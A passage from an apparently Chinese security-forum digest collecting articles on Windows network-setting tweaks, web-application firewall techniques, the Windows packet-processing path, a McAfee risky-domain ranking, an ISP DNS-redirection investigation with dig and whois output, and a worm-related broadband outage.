修改注册表的相关网络键值就能实现。进入“运行”输入“regedit”命令，打开注册表编辑，确定在

HKEY_USERS\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network

分支上，在右侧区域中，依次选择“编辑”、“新建”、“Dword值”选项，将新建的Dword值命名为“NoNetSetup”，将其数值输入为“1”，重新启动电脑，系统就会提示无法进入网络属性设置窗口了。

隐藏本地连接图标法

本地连接图标与系统的Netcfgx.dll、Netshell.dll、Netman.dll这三个动态链接文件有关，一旦将这三个动态链接文件反注册的话，那么本地连接图标就会被自动隐藏起来了。在反注册上面三个动态链接文件时，可以先打开系统运行框，并在其中输入字符串命令“regsvr32 Netcfgx.dll/u”命令，单击一下“确定”按钮后，就能把Netcfgx.dll文件反注册了。

安全知识　防火墙应用安全八项实用技术

作者：smtk　来源：赛迪网安全社区

什么是应用安全呢？应用安全就是对网络应用的安全保障，这些应用包括：信用卡号码、机密资料、用户档案等信息。那么什么是保护这些应用不受恶意攻击的困难所在呢？，在我们看来这些应用最薄弱的环节是通过网络防火墙上的端口80（主要用于HTTP）和端口443（用于SSL）时受到的攻击。那么防火墙怎么对这些攻击进行发现及封阻呢？下文总结了八项应用安全技术，全文如下：

　　深度数据包处理

　　深度数据包处理有时被称为深度数据包检测或者语义检测，它就是把多个数据包关联到一个数据流当中，在寻找攻击异常行为的同时，保持整个数据流的状态。深度数据包处理要求以极高的速度分析、检测及重新组装应用流量，以避免给应用带来时延。下面每一种技术代表深度数据包处理的不同级别。

　　TCP/IP终止

　　应用层攻击涉及多种数据包，并且常常涉及多种请求，即不同的数据流。流量分析系统要发挥功效，就必须在用户与应用保持互动的整个会话期间，能够检测数据包和请求，以寻找攻击行为。至少，这需要能够终止传输层协议，并且在整个数据流而不是仅仅在单个数据包中寻找恶意模式。

　　SSL终止

　　如今，几乎所有的安全应用都使用HTTPS确保通信的保密性。然而，SSL数据流采用了端到端加密，因而对被动探测器如入侵检测系统（IDS）产品来说是不透明的。为了阻止恶意流量，应用防火墙必须终止SSL，对数据流进行解码，以便检查明文格式的流量。这是保护应用流量的最起码要求。如果你的安全策略不允许敏感信息在未加密的前提下通过网络传输，你就需要在流量发送到Web服务器之前重新进行加密的解决方案。

　　URL过滤

　　一旦应用流量呈明文格式，就必须检测HTTP请求的URL部分，寻找恶意攻击的迹象，譬如可疑的统一代码编码（unicode encoding）。对URL过滤采用基于特征的方案，仅仅寻找匹配定期更新的特征、过滤掉与已知攻击如红色代码和尼姆达有关的URL，这是远远不够的。这就需要一种方案不仅能检查RUL，还能检查请求的其余部分。其实，如果把应用响应考虑进来，可以大大提高检测攻击的准确性。虽然URL过滤是一项重要的操作，可以阻止通常的脚本少年类型的攻击，但无力抵御大部分的应用层漏洞。

　　请求分析

　　全面的请求分析技术比单单采用URL过滤来得有效，可以防止Web服务器层的跨站脚本执行（cross-site scripting）漏洞和其它漏洞。全面的请求分析使URL过滤更进了一步：可以确保请求符合要求、遵守标准的HTTP规范，同时确保单个的请求部分在合理的大小限制范围之内。这项技术对防止缓冲器溢出攻击非常有效。然而，请求分析仍是一项无状态技术。它只能检测当前请求。正如我们所知道的那样，记住以前的行为能够获得极有意义的分析，同时获得更深层的保护。

　　用户会话跟踪

　　更先进的下一个技术就是用户会话跟踪。这是应用流量状态检测技术的最基本部分：跟踪用户会话，把单个用户的行为关联起来。这项功能通常借助于通过URL重写（URL rewriting）来使用会话信息块加以实现。只要跟踪单个用户的请求，就能够对信息块实行极其严格的检查。这样就能有效防御会话劫持（session-hijacking）及信息块中毒（cookie-poisoning）类型的漏洞。有效的会话跟踪不仅能够跟踪应用防火墙创建的信息块，还能对应用生成的信息块进行数字签名，以保护这些信息块不被人篡改。这需要能够跟踪每个请求的响应，并从中提取信息块信息。

　　响应模式匹配

　　响应模式匹配为应用提供了更全面的保护：它不仅检查提交至Web服务器的请求，还检查Web服务器生成的响应。它能极其有效地防止网站受毁损，或者更确切地说，防止已毁损网站被浏览。对响应里面的模式进行匹配相当于在请求端对URL进行过滤。响应模式匹配分三个级别。防毁损工作由应用防火墙来进行，它对站点上的静态内容进行数字签名。如果发现内容离开Web服务器后出现了改动，防火墙就会用原始内容取代已毁损页面。至于对付敏感信息泄露方面，应用防火墙会监控响应，寻找可能表明服务器有问题的模式，譬如一长串Java异常符。如果发现这类模式，防火墙就会把它们从响应当中剔除，或者干脆封阻响应。

　　采用“停走”字（‘stop and go’word）的方案会寻找必须出现或不得出现在应用生成的响应里面的预定义通用模式。譬如说，可以要求应用提供的每个页面都要有版权声明。

　　行为建模

　　行为建模有时称为积极的安全模型或“白名单”（white list）安全，它是唯一能够防御最棘手的应用漏洞——零时间漏洞的保护机制。零时间漏洞是指未写入文档或“还不知道”的攻击。对付这类攻击的唯一机制就是只允许已知是良好行为的行为，其它行为一律禁止。这项技术要求对应用行为进行建模，这反过来就要求全面分析提交至应用的每个请求的每次响应，目的在于识别页面上的行为元素，譬如表单域、按钮和超文本链接。这种级别的分析可以发现恶意表单域及隐藏表单域操纵类型的漏洞，同时对允许用户访问的URL实行极其严格的监控。行为建模是唯一能够有效对付全部16种应用漏洞的技术。行为建模是一种很好的概念，但其功效往往受到自身严格性的限制。某些情况譬如大量使用JavaScript或者应用故意偏离行为模型都会导致行为建模犯错，从而引发误报，拒绝合理用户访问应用。行为建模要发挥作用，就需要一定程度的人为干预，以提高安全模型的准确性。行为自动预测又叫规则自动生成或应用学习，严格说来不是流量检测技术，而是一种元检测（meta-inspection）技术，它能够分析流量、建立行为模型，并且借助于各种关联技术生成应用于行为模型的一套规则，以提高精确度。行为建模的优点在于短时间学习应用之后能够自动配置。保护端口80是安全人员面临的最重大也是最重要的挑战之一。所幸的是，如今已出现了解决这一问题的创新方案，而且在不断完善。如果在分层安全基础设施里面集成了能够封阻16类应用漏洞的应用防火墙，你就可以解决应用安全这一难题。

【知识】TCP/IP 数据包处理路径_了解WINDOWS防火墙,更好的保护系统

简介

随着 Microsoft® Windows® XP Service Pack 2 和 Windows Server™ 2003 Service Pack 1 新增了 Windows 防火墙，以及 Internet 协议安全 (IPsec) 在公司 Intranet 中日益广泛的应用，信息技术 (IT) 专业人士需要了解 TCP/IP 协议及 Windows 中的相关组件处理单播 Internet 协议 (IP) 数据包的具体方式。有关 IP 数据包处理路径的详细知识，可以让您更轻松地掌握配置数据包处理和筛选组件，以及进行相关疑难解答的具体方法。

本文所介绍的内容如下：

• 用于 IP 版本 4 的 TCP/IP 协议的基本体系结构以及其它一些用于处理数据包的组件。

• 基于 Windows 的计算机所发送、接收和转发的单播流量的数据包处理路径

注意 为了简要起见，本文将不讨论多播、广播、分段或隧道数据包。

下列组件可处理 IP 数据包：

• IP 转发 为发送或转发的数据包确定下一跃点接口和地址。

• TCP/IP 筛选 允许按 IP 协议、TCP 端口或 UDP 端口，指定可为传入的本地主机流量（发往主机的数据包）所接受的流量类型。可以在“网络连接”文件夹中，从 Internet 协议 (TCP/IP) 组件高级属性的“选项”选项卡，配置 TCP/IP 筛选。

• 筛选器挂钩驱动程序 该 Windows 组件可使用筛选器挂钩 API，筛选传入和传出的 IP 数据包。在运行 Windows Server 2003 的计算机上，筛选器挂钩驱动程序为 Ipfltdrv.sys，属于“路由和远程访问”的一个组件。启用后，“路由和远程访问”允许用户使用路由和远程访问管理单元，对每个接口配置单独的入站和出站 IP 数据包筛选器。Ipfltdrv.sys 会同时检查本地主机和中转 IP 流量（不发往主机的数据包）。

• 防火墙挂钩驱动程序 该 Windows 组件可使用防火墙挂钩 API，检查传入和传出的数据包。在运行 Windows XP 的计算机上，防火墙挂钩驱动程序为 Ipnat.sys，由 Internet 连接共享和 Windows 防火墙双方共享。Internet 连接共享是一种基础网络地址转换器 (NAT)。Windows 防火墙是一种基于主机的状态防火墙。Ipnat.sys 可同时检查本地主机和中转 IP 流量。在运行 Windows Server 2003 的计算机上，Ipnat.sys 由 Internet 连接共享、Windows 防火墙和路由和远程访问的 NAT/基本防火墙组件三方共享。如果启用了路由和远程访问的 NAT/基本防火墙组件，就不能再启用 Windows 防火墙或 Internet 连接共享了。

• IPsec IPsec 组件——Ipsec.sys——是 IPsec 在 Windows 中的实现，可对 IP 流量提供加密保护。Ipsec.sys 可同时检查本地主机和中转 IP 流量，并可允许、阻止或保护流量。

数据包处理路径

下面几节介绍了针对以下流量的具体的数据包处理路径：

• 源流量 由基于 Windows 的发送主机发起。

• 目标流量 达到最终的基于 Windows 的目标主机。

• 中转流量 由基于 Windows 的 IP 路由器转发。

这里只讨论 Windows Server 2003 或 Windows XP 所附带的组件，不涉及 Windows 套接字分层服务提供程序或 NDIS 中间微型端口驱动程序。

源流量

IP 数据包形成后，Tcpip.sys 就会将其传递给防火墙挂钩驱动程序 (Ipnat.sys) 进行处理。

Windows 防火墙检查该流量是否属于所要阻止的特定的 Internet 控制消息协议 (ICMP) 消息类型。如果 ICMP 消息被阻止，Windows 防火墙就将丢弃该数据包。

Windows 防火墙检查该流量是否属于点对点隧道协议 (PPTP) 隧道维护流量。如果属于的话，Windows 防火墙将分析该流量，确定用于识别特定 PPTP 隧道的通用路由封装 (GRE) 调用 ID，从而允许 PPTP 隧道的基于 GRE 的传入流量。

如果需要，Windows 防火墙会在例外列表中添加一个动态项目，来允许响应流量。

处理完后，Ipnat.sys 会将该 IP 数据包传回给 Tcpip.sys，而后者会使用 IP 转发组件，确定下一跃点 IP 地址和接口。有关详细信息，请参阅认识 IP 路由表。

Tcpip.sys 将数据包传递给筛选器挂钩驱动程序 (Ipfltdrv.sys) 进行处理。

Ipfltdrv.sys 根据下一跃点接口，将该数据包与已配置的出站 IP 数据包筛选器进行对比。

若出站 IP 数据包筛选器不允许该数据包，Ipfltdrv.sys 就会在不给出提示的情况下，丢弃该数据包。若出站 IP 数据包筛选器允许该数据包，Ipfltdrv.sys 就会将该数据包传回给 Tcpip.sys。

Tcpip.sys 将该数据包传递给 Ipsec.sys 进行处理。

Ipsec.sys 根据 IPsec 筛选器组，决定是否允许、阻止或保护该数据包。若允许的话，Ipsec.sys 会在不修改该数据包的情况下，将其发回给 Tcpip.sys。若阻止的话，Ipsec.sys 会在不发出任何提示的情况下，丢弃该数据包。若要进行保护的话，Ipsec.sys 会在将数据包传回给 Tcpip.sys 之前，对其添加适当的 IPsec保护。有关 IPsec 筛选器的详细信息，请参阅IPsec 筛选器排序（2005 年 2 月发布的 网络专家 专栏文章。

Tcpip.sys 随后会通过下一跃点接口，将该数据包发送到下一跃点 IP 地址。

目标流量

接收到 IP 数据包后，Tcpip.sys 会将其传递给 Ipsec.sys 进行处理。

若数据包带有 IPsec 保护（指示验证头 [AH] 或封装式安全措施负载 [ESP] 的 IP 协议字段值），将对其进行处理并加以移除。若对计算机应用了“Windows 防火墙：允许已验证的 IPSec 跳过”组策略设置，Ipsec.sys 将设置一个与该数据包相关联的 IPsec Bypass 标记。Ipsec.sys 将结果数据包传回给 Tcpip.sys。

若数据包不带有 IPsec 保护，Ipsec.sys 就会根据 IPsec 筛选器组，决定是否允许、阻止或保护该数据包。若允许的话，Ipsec.sys 会在不修改该数据包的情况下，将其发回给 Tcpip.sys。若数据包被阻止或需要保护，Ipsec.sys 就会在不发出任何提示的情况下，丢弃该数据包。

Tcpip.sys 将该数据包传递给 Ipfltdrv.sys 进行处理。

Ipfltdrv.sys 根据接收数据包的接口，将该数据包与已配置的入站 IP 数据包筛选器进行对比。

若入站 IP 数据包筛选器不允许该数据包，Ipfltdrv.sys 就会在不给出提示的情况下，丢弃该数据包。 若入站 IP 数据包筛选器允许该数据包，Ipfltdrv.sys 就会将该数据包传回给 Tcpip.sys。

Tcpip.sys 将该数据包传递给 Ipnat.sys 进行处理。

若启用了 Internet 连接共享或 NAT/基本防火墙，并且接收数据包的接口是连接到 Internet 的公共接口，Ipnat.sys 就会将该数据包与其 NAT 转换表进行对比。若找到了匹配项，就将转换该 IP 数据包，并将结果数据包视为源流量。

Windows 防火墙检查与该数据包相关联的 IPsec Bypass 标记。若设置了 IPsec Bypass 标记，Windows 防火墙就会将该数据包传回给 Tcpip.sys。

若未设置 IPsec Bypass 标记，Windows 防火墙就会将该数据包与其例外列表进行对比。若数据包与某个例外匹配，Ipnat.sys 就会将该 IP 数据包传回给 Tcpip.sys。若不匹配，Ipnat.sys 会在不发出提示的情况下，丢弃该 IP 数据包。

Tcpip.sys 将 IP 数据包与已配置的 TCP/IP 筛选允许的那组数据包进行对比。

若 TCP/IP 筛选不允许该数据包，Tcpip.sys 将在不发出提示的情况下，丢弃该数据包。若 TCP/IP 筛选允许该数据包，Tcpip.sys 将继续对其进行处理，并最终将该数据包有效负载传递给 TCP、UDP 或其它上层协议。

中转流量

接收到 IP 数据包后，Tcpip.sys 会将其传递给 Ipfltdrv.sys 进行处理。

Ipfltdrv.sys 根据接收 IP 数据包的接口，将该数据包与已配置的入站 IP 数据包筛选器进行对比。

若入站 IP 数据包筛选器不允许该数据包，Ipfltdrv.sys 就会在不给出提示的情况下，丢弃该 IP 数据包。若入站 IP 数据包筛选器允许该数据包，Ipfltdrv.sys 就会将该 IP 数据包传回给 Tcpip.sys。

Tcpip.sys 将数据包传递给 IP 转发组件，由后者确定用于转发该数据包的下一跃点接口和地址。

2. Tcpip.sys 将该数据包传递给 Ipnat.sys。

若启用了 Internet 连接共享或 NAT/基本防火墙，并且接收数据包的接口是连接到 Intranet 的专用接口，Ipnat.sys 就会将该数据包与其 NAT 转换表进行对比。若 Internet 连接共享或 NAT/基本防火墙找到了匹配项，将转换该 IP 数据包，并将结果数据包当作源流量。若 Internet 连接共享或 NAT/基本防火墙未找到匹配项，将创建一个新的 NAT 转换表项，转换 IP 数据包，并将结果数据包当作源流量。

若未启用 Internet 连接共享，Ipnat.sys 就会将 IP 数据包传回给 Tcpip.sys。

3. Tcpip.sys 将该数据包传递给 Ipfltdrv.sys。

Ipfltdrv.sys 根据下一跃点接口，将该数据包与已配置的出站 IP 数据包筛选器进行对比。

若出站 IP 数据包筛选器不允许该数据包，Ipfltdrv.sys 就会在不给出提示的情况下，丢弃该 IP 数据包。若出站 IP 数据包筛选器允许该数据包，Ipfltdrv.sys 就会将该 IP 数据包传回给 Tcpip.sys。

4. Tcpip.sys 将该数据包传递给 Ipsec.sys 进行处理。

Ipsec.sys 根据 IPsec 筛选器组，决定是否允许、阻止或保护该数据包。若允许的话，Ipsec.sys 会在不修改该数据包的情况下，将其发回给 Tcpip.sys。 若阻止的话，Ipsec.sys 会在不发出任何提示的情况下，丢弃该数据包。若要进行保护的话，Ipsec.sys 会在将数据包传回给 Tcpip.sys 之前，对其添加适当的 IPsec保护。

Tcpip.sys 随后会通过下一跃点接口，将该 IP 数据包发送到下一跃点地址。

对于运行 Windows XP SP2 或 Windows Server 2003 SP1 并采取常规配置的客户端或服务器计算机（不充当路由器或 NAT，并禁用了 TCP/IP 筛选），源流量的数据包处理路径涉及以下组件：

1. Windows 防火墙

2. IPsec

对于上述采用常规配置的基于 Windows 的计算机来说，目标流量的数据包处理路径涉及以下组件：

1. IPsec

2. Windows 防火墙

若使用了 IPsec，并启用了 Windows 防火墙，那么可能需要配置这两个组件，以允许想要的流量。譬如，要是您正在配置一台 Web 服务器，并使用 IPsec 保护发往该服务器的 Web 流量，就必须配置以下项目：

1. 一个 IPsec 规则（要求发往和发自该服务器的 IP 地址和 TCP 端口 80 的安全性）。

2. 一个 TCP 端口 80 的 Windows 防火墙例外。

该 IPsec 规则可确保发往 Web 服务器服务的流量受到保护。该 Windows 防火墙例外可确保 Windows 防火墙不会丢弃未经请求的传入请求，来通过 TCP 端口 80 创建到 Web 服务器的连接。由于 IPsec 和 Windows 防火墙都作为单独的组件处理 IP 数据包，因此必须同时配置这两个组件。要是不想让 Windows 防火墙处理受 IPsec 保护的数据包，请配置“Windows 防火墙：允许已验证的 IPSec 跳过”组策略设置。

更多详细信息:

http://www.microsoft.com/downloa ... &DisplayLang=en

十大危险域名出炉　最安全的还是.gov

作者：hackmaster　来源：赛迪网安全社区

McAfee周一发布报告称，他们发现美国政府机构的网站没有风险。相反，托克劳群岛（新西兰属地，位于南太平洋）的网站很不安全，每十个以.tk结尾的网站中就有一个存在风险，像散布恶意软件，弹出窗口等等。互联网上最安全的网站是那些以.gov域名结尾的政府网站。

McAfee测试了上百万的顶级域名网站，这些网站占据了95%的互联网访问流量。McAfee发现，不同的域名网站之间的安全性存在着令人吃惊的差异。

McAfee使用其SiteAdvisor来检测网站的安全性，共有三个级别：红，黄，绿。

其中，参加测试的网站中，仅有4.1%的网站被亮了红灯，这些网站一般携带恶意软件，像广告软件，间谍软件或是病毒。被亮黄灯的网站可能有弹出式广告。绿灯网站被认为是安全的。

据悉，最不安全的国家域名网站是.ro（罗马尼亚）和.ru（俄罗斯）的网站，分别有5.6%和4.5%的这些网站被亮红灯。这些国家的网站很容易成为恶意软件的宿主网站。

.fi（芬兰），.ie（爱尔兰）以及.no（挪威）的网站访问比较安全。参加测试的这三个国家的网站中，仅有0.10%，0.11%以及0.16%的网站被亮红灯。

虽然.com域名是最流行的网站域名，但它并不是最危险的网站。.info网站存在的问题较大，有7.5%的.info网站被亮红灯，有5.5%的.com网站也比较危险。

但是，由于.com的访问用户量巨大，因此，其影响力也不可小视。SiteAdvisor发现，有86.6%的点击报警是.com网站用户引起的。

世界十大危险域名

第一名：Tokelau (.tk)

第二名：Information (.info)

第三名：Samoa (.ws)

第四名：Romania (.ro)

第五名：Commercial (.com)

第六名：Business (.biz)

第七名：Russia (.ru)

第八名：Network (.net)

第九名：Families and Individuals (.name)

第十名：Slovakia (.sk)

关注:上海电信DNS劫持事件[含技术分析]

据查证,上海电信在近一个月内对其所属的DNS服务器做了某些明显违背互联网规范的行为,导致出现将客户浏览器导向其自身所辖的114号码百事通,此种行为非常令人不齿.使用上海电信宽带接入的朋友可能最近也经常像我一样在浏览网站时莫名其妙地输入网址后转向了114查询的页面,此类事故在以前曾听过有类似的传言,而以前我个人并未碰到,所以并不在意,但如今我是天天被114这个破烂页面骚扰,于是也不得不仔细找找原因了.

首先解释一下什么是DNS劫持。严格来说上海电信的这种行为不能算是DNS劫持，但似乎除了这个名词也没有更适合的词来形容这种行为了，所以就需要解释一下DNS劫持的来龙去脉，免得有人说我误导初学者。
DNS劫持是网络安全界常见的一个名词，意思是通过某些手段取得某一目标域名的解析记录控制权，进而修改此域名的解析结果，通过此修改将对此域名的访问由原先的IP地址转入到自己指定的IP，从而实现窃取资料或者破坏原有正常服务的目的。举个例子，例如www.sohu.com原指向1.1.1.1，这个 IP是sohu正常服务的服务器IP。而某黑人拿到了修改sohu.com域名解析的权利，将其解析记录修改为2.2.2.2，则修改后对于 www.sohu.com的访问都会指向2.2.2.2这个IP。此黑人在2.2.2.2这个他自己所有的IP上放了一个完全仿冒的sohu主页，只是将登陆sohu邮箱的这个界面改为把客户填写的邮箱名和密码记录下来。这样普通客户访问www.sohu.com时看到的是表面为sohu主页，而实际为假冒页面的李鬼了。此时客户如果继续登陆其sohu邮箱，则其帐户就被黑人拿到了。

回到主题---有关上海电信的DNS劫持行为。在我发现近期浏览网页出现异常的这段时间里，我注意搜索了一下关于这方面的讨论，发现上海电信的这种不道德行为确实是存在的，只是我以前恰好没有入套而已。根据我搜索来的资料，在06年下半年的时间里，上海电信实现了通过IE浏览器搜索功能来推送电信的114 搜索。其具体原理是与IE本身的实现相关。简单来说，IE对于输入的网址，如果无法正常解析其域名或者输入的根本就不是域名的话，会调用它自身定义的搜索引擎来搜索这个地址。这个搜索引擎，默认是MSN（在之前是3721，但06年微软终止了与3721的合同，所以是MSN）。所以此时地址会转向 http://auto.search.msn.com。上海电信为了将这部分流量导入自己的怀里，做了2种小动作：
&S226;第一是在他们的星空XX拨号软件里，只要安装这个软件，就会修改注册表将IE的搜索引擎改为http://search.114.vnet.cn，于是这些流量被导入到114，此做法尚可忍受，因为毕竟软件是可以选择的，而修改也是可以改回来的。
&S226;第二就是DNS劫持了，这就是公然违反网络标准以及违反互联网道德的行为了。具体细节就是在上海电信的几个DNS服务器中作手脚，将对auto.search.msn.com这个域名解析的应答篡改为他们自己的IP地址，这是很容易查出来的：
首先看由Root服务器下来的权威结果，我们用DNSStuff这个在线网站测试，URL为http://www.dnsstuff.com/tools/lookup.ch?name=auto.search.msn.com&type=A，可以看到如下结果：

Response:

Domain Type Class TTL Answer
a134.g.akamai.net.6528acf.1.cn.akamaitech.net. A IN 20 67.130.109.38
a134.g.akamai.net.6528acf.1.cn.akamaitech.net. A IN 20 67.130.109.16

NOTE: One or more CNAMEs were encountered. auto.search.msn.com is really a134.g.akamai.net.6528acf.1.cn.akamaitech.net. [auto.search.msn.com->sea.search.msn.com->sea.search.msn.com.nsatc.net->
search.msn.com.edgesuite.net->a134.g.akamai.net->
a134.g.akamai.net.6528acf.1.cn.akamaitech.net]



再来看我们使用了上海热线DNS所解析出来的结果，我这里用BIND提供的dig工具来取结果：


# dig @202.96.209.5 A auto.search.msn.com

; <<>> DiG 9.2.4 <<>> @202.96.209.5 A auto.search.msn.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18248
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 5, ADDITIONAL: 4

;; QUESTION SECTION:
;auto.search.msn.com. IN A

;; ANSWER SECTION:
auto.search.msn.com. 86400 IN A 218.30.64.194

;; AUTHORITY SECTION:
auto.search.msn.com. 86400 IN NS ns-puxi.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-pudong.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-pd.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-px.online.sh.cn.
auto.search.msn.com. 86400 IN NS ns-px2.online.sh.cn.

;; ADDITIONAL SECTION:
ns-pd.online.sh.cn. 86400 IN A 202.96.209.133
ns-px.online.sh.cn. 86400 IN A 202.96.209.5
ns-puxi.online.sh.cn. 86400 IN A 202.96.209.5
ns-pudong.online.sh.cn. 86400 IN A 202.96.209.133

;; Query time: 23 msec
;; SERVER: 202.96.209.5#53(202.96.209.5)
;; WHEN: Wed Mar 14 14:51:08 2007
;; MSG SIZE rcvd: 236


可以看到auto.search.msn.com被解析到了218.30.64.194这个IP，这显然是不对的，而本应属于微软的msn域名的NS记录竟然为5个上海热线的域名服务器，很明显猫腻就在这里了。
那我们就顺便查查218.30.64.194这个IP的所有，通过IP whois信息库，查询方法也是通过方便至极的DNSStuff，URL如下：http://www.dnsstuff.com/tools/whois.ch?ip=218.30.64.194，摘录一下结果：


WHOIS results for 218.30.64.194
Generated by www.DNSstuff.com
Location: China [City: Shenzhen, Guangdong]

ARIN says that this IP belongs to APNIC; I'm looking it up there.


% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 218.30.64.0 - 218.30.64.255
netname: CHINANET-CN
country: CN
descr: Chinavnet
descr: No.31 ,jingrong street,beijing
admin-c: CH93-AP
tech-c: CH93-AP
status: ALLOCATED NON-PORTABLE
changed: *****@chinatelecom.com.cn 20051026
mnt-by: MAINT-CHINANET
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: *********@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: *****@chinatelecom.com.cn 20051212
mnt-by: MAINT-CHINANET
source: APNIC


很明显这个IP是中国电信的，而msn的域名就是这样被强奸到了中国电信的IP。


以上就是06年中上海电信所做的手脚了，其实对于如此行为我个人还是可以忍受的，因为第一我不会去装什么星空XXX，即使装了我也有办法不用你的东西。第二我不用MSN的搜索，你劫持了它对我没什么影响。然而，从最近一段时间的异常来看，事情显然已经不只是这个地步了，因为我在用各种浏览器各种搜索引擎的时候都碰到了被转向了114的情况，再加上我个人工作所维护的一些邮件服务器最近发现的怪异情况，我有理由怀疑上海电信在DNS上做了更令人不齿的行为。很不幸，我只是简单测试了一下，就发现确实如此，这次的行为可谓明刀明枪的抢劫了：

C:>ping notpresentxxxxxxxxxx.cn

Pinging notpresentxxxxxxxxxx.cn [218.83.175.154] with 32 bytes of data:

Reply from 218.83.175.154: bytes=32 time=124ms TTL=242
Reply from 218.83.175.154: bytes=32 time=122ms TTL=242
Reply from 218.83.175.154: bytes=32 time=134ms TTL=242
Reply from 218.83.175.154: bytes=32 time=134ms TTL=242

Ping statistics for 218.83.175.154:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 122ms, Maximum = 134ms, Average = 128ms
C:>ping dsfsdofhetfowefuwdf.com

Pinging dsfsdofhetfowefuwdf.com [218.83.175.154] with 32 bytes of data:

Reply from 218.83.175.154: bytes=32 time=126ms TTL=242
Reply from 218.83.175.154: bytes=32 time=125ms TTL=242
Reply from 218.83.175.154: bytes=32 time=116ms TTL=242
Reply from 218.83.175.154: bytes=32 time=118ms TTL=242

Ping statistics for 218.83.175.154:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 116ms, Maximum = 126ms, Average = 121ms

C:>ping gherogfhgnewlffefh.com

Pinging gherogfhgnewlffefh.com [218.83.175.154] with 32 bytes of data:

Reply from 218.83.175.154: bytes=32 time=674ms TTL=242
Reply from 218.83.175.154: bytes=32 time=1007ms TTL=242
Reply from 218.83.175.154: bytes=32 time=1002ms TTL=242
Reply from 218.83.175.154: bytes=32 time=812ms TTL=242

Ping statistics for 218.83.175.154:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 674ms, Maximum = 1007ms, Average = 873ms


相信会用ping命令的网友们自然能看得懂这段输出的意思，简单来说，我ping了3个根本不存在的域名，本应出现找不到域名错误(hostname not found)，然而这显然不存在的3个域名竟然能得到解析结果，而无一例外的指向同一个IP----218.83.175.154。这个IP是什么我想大家应该也会非常有兴趣知道，点一下看看吧http://218.83.175.154。照样不能忘记把这个IP的whois信息拿出来作证据：http://www.dnsstuff.com/tools/whois.ch?ip=218.83.175.154，顺便贴出来：



WHOIS results for 218.83.175.154
Generated by www.DNSstuff.com
Location: China [City: Shanghai, Shandong]

ARIN says that this IP belongs to APNIC; I'm looking it up there.


% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 218.78.0.0 - 218.83.255.255
netname: CHINANET-SH
descr: CHINANET Shanghai province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: XI5-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET-SH
mnt-routes: MAINT-CHINANET-SH
status: ALLOCATED PORTABLE
changed: **********@apnic.net 20060427
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: *********@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: *****@chinatelecom.com.cn 20051212
mnt-by: MAINT-CHINANET
source: APNIC

person: Wu Xiao Li
address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country: CN
phone: +86-21-63630562
fax-no: +86-21-63630566
e-mail: ********@mail.online.sh.cn
nic-hdl: XI5-AP
mnt-by: MAINT-CHINANET-SH
changed: ********@mail.online.sh.cn 20010510
source: APNIC


铁证如山，看你上海电信还如何抵赖，目前我自己发现的出现问题的DNS服务器有202.96.209.5，202.96.209.6， 202.96.209.133，202.96.209.134，都为上海电信ADSL的DHCP默认指派的DNS，应该还有数个服务器应该也是类似，只是我没有去求证。

做为中国最大的ISP，发布广告无可厚非，但却打着官方的旗号公然破坏互联网基础设施，公然违反互联网RFC，真可谓给国内各大企业带了个好头，再加上CNNIC的流氓行为，中国互联网还有什么前途？！我作为IT网络业界的一个普通技术人员，对此现状真的感到深深的悲哀。

现在唯一还能让我高兴起来的事情，就是似乎这个转入到114查询的关键字似乎是随机选取的，经常会出现让人哭笑不得的结果，莫非电信的技术们也开始学习玩无厘头风格了？

【播报】宽带用户大规模中毒断网

　　海电信公司：故障已找出并登出“治病”公告

　　据上海电信有关方面昨天表示，从本月13日开始，宽带用户开始比较多地出现断网故障，公司的故障受理部门陆续接到不少adsl用户反映，在使用adsl上网一段时间后会发生网络中断，拨号工具同时出现锁死以及无法响应的故障现象。上海电信方面没有透露受影响的用户数量。

　　上海电信有关人士透露，经技术人员现场检测分析，发现此类故障集中发生在使用windowsxp操作系统及windowsxp自带的pppoe拨号软件的系统环境下。

　　发生断网前，xp操作系统可能会弹出“generichostprocessforwin32services”的错误提示信息。“发生断网的原因，是由于微软windowsxp存在某个安全漏洞，被病毒利用攻击。”上海电信故障报修台的工作人员介绍说，微软已经发布了针对该漏洞的补丁程序，用户给自己的电脑打上这个补丁，断网的故障便可以排除。

　　“公司已经在上海热线中发布了紧急公告，”上海电信有关人士表示，在紧急公告中公司向adsl用户提供了排除问题的解决办法。记者随后登陆上海热线，在首页左侧发现了一行“电信公司adsl紧急公告”的字样。按照公告的内容，电信公司建议adsl用户密切关注微软安全公告网站中有关此故障的安全补丁更新通告。

　　病毒防范中心：染毒计算机会被黑客远程控制

　　除了上海电信的故障报修台，市计算机病毒防范中心这两天也成了宽带用户出现上网中断故障后求助的另外一个渠道。该中心相关负责人吴恩平表示，最近三天里共接到相关的求助电话超过800个。中心的诊断和电信公司基本一致，即认为导致上网中断是微软ms06-040高危漏洞被名为“魔波”的病毒利用并传播所致。当用户的计算机遭受到该病毒攻击时，会出现系统服务崩溃，无法上网等症状。

